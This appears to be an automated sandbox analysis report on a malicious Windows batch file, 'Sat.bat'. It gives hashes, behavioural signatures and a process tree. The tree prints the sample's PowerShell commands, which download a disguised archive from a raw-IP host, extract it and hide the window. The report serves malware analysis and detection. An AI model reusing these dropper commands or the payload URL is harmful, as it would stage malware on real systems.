Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-11-2024 10:38
Static task
static1
Behavioral task
behavioral1
Sample
Sat.bat
Resource
win7-20240903-en
General
-
Target
Sat.bat
-
Size
2KB
-
MD5
0e2fff554ddadc58aaff7978ec06aa32
-
SHA1
b453b17905235ea96150c90711285f7879d3afc0
-
SHA256
64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80
-
SHA512
c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76
Malware Config
Extracted
http://109.199.101.109:770/xx.jpg
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 2092 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 1736 powershell.exe 2092 powershell.exe 2152 powershell.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1436 timeout.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1736 powershell.exe 1736 powershell.exe 1736 powershell.exe 2092 powershell.exe 2152 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 2152 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.exepowershell.execmd.exedescription pid process target process PID 2552 wrote to memory of 1736 2552 cmd.exe powershell.exe PID 2552 wrote to memory of 1736 2552 cmd.exe powershell.exe PID 2552 wrote to memory of 1736 2552 cmd.exe powershell.exe PID 1736 wrote to memory of 1936 1736 powershell.exe cmd.exe PID 1736 wrote to memory of 1936 1736 powershell.exe cmd.exe PID 1736 wrote to memory of 1936 1736 powershell.exe cmd.exe PID 1936 wrote to memory of 2092 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 2092 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 2092 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 2152 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 2152 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 2152 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 1436 1936 cmd.exe timeout.exe PID 1936 wrote to memory of 1436 1936 cmd.exe timeout.exe PID 1936 wrote to memory of 1436 1936 cmd.exe timeout.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "3⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak4⤵
- Delays execution with timeout.exe
PID:1436
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52b8f1c6a03d9dfe38a97ef437cb49f91
SHA131cf386ba675a25ffcc3e8a64ce0cb92ab7f3f4c
SHA256bc985cc0c909c633d2283b827cd051a35cee9fbbfd607be4aaaecccce239a79a
SHA512837b126a8fbc53ac5d6455abf21a21765227ef27546b4d7557743d766914c1bb04b7e9c3437a5e582e9cfdb5efa3c5dea79024bbd5c5cdea58dc4fe55182c83e